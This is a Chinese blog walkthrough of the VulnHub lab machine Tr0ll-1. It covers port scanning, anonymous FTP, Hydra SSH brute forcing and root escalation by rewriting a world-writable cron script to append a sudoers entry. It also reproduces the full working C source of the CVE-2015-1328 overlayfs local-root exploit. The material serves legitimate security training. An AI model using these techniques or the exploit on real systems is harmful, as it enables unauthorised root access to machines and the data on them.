vulnhub靶机渗透[Tr0ll-1]

Posted on Edited on In Views: Word count in article: 3.6k Reading time ≈ 13 mins.

名称

名称:Tr0ll: 1
发布日期:2014年8月14日

下载

  • Download: http://overflowsecurity.com/files/Tr0ll.rar
  • Download (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll.rar
  • Download (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll.rar.torrent

描述

Tr0ll的灵感来自OSCP实验室中不断摇曳的机器。目标很简单,获得root权限并从/ root目录获取Proof.txt。不为容易受挫!公平警告,前方有巨魔!难度:初学者类型:boot2root

特别感谢@ OS_Eagle11和@superkojiman自始至终经历了测试!本机应使用DHCP提取IP,如果有任何问题,请与我联系以获取密码以使其正常工作。反馈总是很感激!male

Freenode-Maleus

1
MD5SUM (Tr0ll.rar): 318fe0b1c0dd4fa0a8dca43edace8b20

信息收集

上nmap

1
2
3
4
5
root@kali:~# nmap -sV -p- -v 192.168.66.15
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~# nmap -A -p 21,22,80 -v 192.168.66.15 --script=vuln -T4
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown: 
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|_  /secret/: Potentially interesting folder
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.7: 
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2014-0226   6.8     https://vulners.com/cve/CVE-2014-0226
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2016-8743   5.0     https://vulners.com/cve/CVE-2016-8743
|       CVE-2016-2161   5.0     https://vulners.com/cve/CVE-2016-2161
|       CVE-2016-0736   5.0     https://vulners.com/cve/CVE-2016-0736
|       CVE-2014-3523   5.0     https://vulners.com/cve/CVE-2014-3523
|       CVE-2014-0231   5.0     https://vulners.com/cve/CVE-2014-0231
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2016-4975   4.3     https://vulners.com/cve/CVE-2016-4975
|       CVE-2015-3185   4.3     https://vulners.com/cve/CVE-2015-3185
|       CVE-2014-8109   4.3     https://vulners.com/cve/CVE-2014-8109
|       CVE-2014-0118   4.3     https://vulners.com/cve/CVE-2014-0118
|       CVE-2014-0117   4.3     https://vulners.com/cve/CVE-2014-0117
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|_      CVE-2016-8612   3.3     https://vulners.com/cve/CVE-2016-8612

通过枚举,得到了一些有趣的东西:

  • 允许匿名FTP登录
  • HTTP服务有2个有趣的页面:robots.txt和secret

允许匿名FTP

有一个文件lol.pcap,发现一些文本文件名secret_stuff.txt被推送到FTP服务器。该文件包含文本:

1
2
3
4
5
6
7
8
9
150 Here comes the directory listing.

-rw-r--r--    1 0        0             147 Aug 10 00:38 secret_stuff.txt

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!

150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).

发现在具有该路径的Web服务器中没有什么有用的。回到从PCAP文件获得的文本文件中的消息。注意到sup3rs3cr3tdirlol一直是supersecretdirlol的代名词,然后检查了它是否可以是HTTP服务的URL路径。发现/sup3rs3cr3tdirlol/存在并且包含一个文件。

检查一下文件类型,发现是一个二进制文件。尝试执行它。

1
2
root@kali:~/vulnhub/troll# file roflmao
roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped

不用逆向二进制文件,因为当二进制文件运行时,没有内存地址0x0856BF。所以尝试再次使用0x0856BF作为HTTP服务中的URL路径。

1
2
root@kali:~/vulnhub/troll# ./roflmao 
Find address 0x0856BF to proceedr

发现2个web目录

/0x0856BF/good_luck/目录

which_one_lol.txt
包含以下的字段

1
2
3
4
5
6
7
8
9
10
maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow

/0x0856BF/this_folder_contains_the_password/目录

Pass.txt
包含以下的字段

1
Good_job_:)

利用

这些文件可能是2个用户或密码。首先,将第一个文件用作用户列表,将第二个文件用作密码。
使用hydra爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
root@kali:~/vulnhub/troll# hydra -s 22 -v -V -L users -P pass -e n -t 1 -w 30 192.168.66.15 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-31 03:34:11
[DATA] max 1 task per 1 server, overall 1 task, 20 login tries (l:10/p:2), ~20 tries per task
[DATA] attacking ssh://192.168.66.15:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://maleus@192.168.66.15:22
[INFO] Successful, password authentication is supported by ssh://192.168.66.15:22
[ATTEMPT] target 192.168.66.15 - login "maleus" - pass "" - 1 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "maleus" - pass "Good_job_:)" - 2 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "ps-aux" - pass "" - 3 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "ps-aux" - pass "Good_job_:)" - 4 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "felux" - pass "" - 5 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "felux" - pass "Good_job_:)" - 6 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "Eagle11" - pass "" - 7 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "Eagle11" - pass "Good_job_:)" - 8 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "genphlux" - pass "" - 9 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "genphlux" - pass "Good_job_:)" - 10 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "usmc8892" - pass "" - 11 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "usmc8892" - pass "Good_job_:)" - 12 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "blawrg" - pass "" - 13 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "blawrg" - pass "Good_job_:)" - 14 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for child 0
[RE-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 15 of 20 [child 0] (0/0)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "Good_job_:)" - 16 of 21 [child 0] (0/1)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 17 of 22 [child 0] (0/2)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "Good_job_:)" - 18 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "" - 19 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "Good_job_:)" - 20 of 23 [child 0] (0/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "" - 21 of 23 [child 0] (1/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "wytshadow" - pass "Good_job_:)" - 22 of 23 [child 0] (2/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[REDO-ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 23 of 23 [child 0] (3/3)
[ERROR] could not connect to target port 22: Connection refused
[ERROR] ssh protocol error
[STATUS] attack finished for 192.168.66.15 (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-31 03:34:49

问题始于用户blawrg,如果hydra无法登录,则主机将阻止Kali的IP。必须更改Kali的IP,然后才能开始尝试新用户。爆破完成,但是没有用户可以登录。

注意到包含Pass.txt的目录是this_folder_contains_the_password。这可能意味着某些情况,因此再次尝试使用Pass.txt作为密码,但溢出后可以使用密码WTH!登录。

1
2
3
4
5
6
7
8
9
[RE-ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 16 of 20 [child 2] (0/0)
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "" - 17 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "vis1t0r" - pass "Pass.txt" - 18 of 20 [child 2] (0/0)
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "" - 19 of 20 [child 0] (0/0)
[ATTEMPT] target 192.168.66.15 - login "overflow" - pass "Pass.txt" - 20 of 20 [child 0] (0/0)
[22][ssh] host: 192.168.66.15   login: overflow   password: Pass.txt
[STATUS] attack finished for 192.168.66.15 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-31 03:41:02

成功登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
root@kali:~# ssh overflow@192.168.66.15
Enter passphrase for key '/root/.ssh/id_rsa': 
overflow@192.168.66.15's password: 
Permission denied, please try again.
overflow@192.168.66.15's password: 
Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/
New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Wed Aug 13 01:14:09 2014 from 10.0.0.12
Could not chdir to home directory /home/overflow: No such file or directory
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)
$ whoami
overflow

提权

登录后,尝试找到该flag,但找不到。由于overflow是低权限用户,因此必须提权并找到root flag,然后再访问更多目录。

  • 已经检查crontabs,并且没有文件可写。
  • tmp目录为空

我开始在var/中检查world可写文件。没有有趣的文件,但是只有一个。

1
2
3
4
5
$ l_path=var/*/*;while [ "$l_path" != / -a "$l_path" != . ]; do ls -ld $l_path; l_path=$(dirname -- "$l_path");done;
...
-rwxrwxrwx  1 root       root            23 Aug 13  2014 var/log/cronlog
...

检查var/log/cronlog

1
2
$ cat var/log/cronlog
*/2 * * * * cleaner.py

这是cron job,每2分钟运行一次。如果可以修改cleaner.py并让系统做点什么,那么就可以升级overflow的权限。但是首先,必须找到cleaner.py。

1
2
$ find / -name cleaner.py 2>/dev/null | grep "cleaner.py"
/lib/log/cleaner.py

查看cleaner.py

1
2
3
4
5
6
7
8
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('rm -r /tmp/* ')
except:
        sys.exit()

找到了python文件,它是可写的。

  • 修改cleaner.py

通过向帐户溢出添加sudo su 权限来修改了cleaner.py。当执行bash命令sudo su时,会得到root shell。

1
2
3
4
5
6
7
8
overflow@troll:/$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
        os.system('echo "overflow ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
        sys.exit()

等待2分钟…。靶机将我踢了出去,再次登录并可升级为root。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ sudo su

[sudo] password for overflow: 
Sorry, try again.
[sudo] password for overflow: 
root@troll:/# id
uid=0(root) gid=0(root) groups=0(root)
root@troll:/# whoami
root
root@troll:/# pwd
/
root@troll:/# cd /root
root@troll:~# ls
proof.txt
root@troll:~# cat proof.txt
Good job, you did it! 


702a8c18d29c6f3ca0d99ef5712bfbdc

提权2

linux 内核提权

参考Linux-Kernel-3.13.0-3.19-Ubuntu-12.04/14.04/14.10/15.04-‘overlayfs’-Local-Privilege-Escalation

  • CVE : CVE-2015-1328
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)

greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n    return _real_getuid();\n}\n"

static char child_stack[1024*1024];

static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}

过程太简单在这里就不多写文演示了

知识点总结

  • ftp匿名登录
  • hydra爆破ssh密码
  • cron job + world writeable py脚本提权
  • CVE-2015-1328 linux内核提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…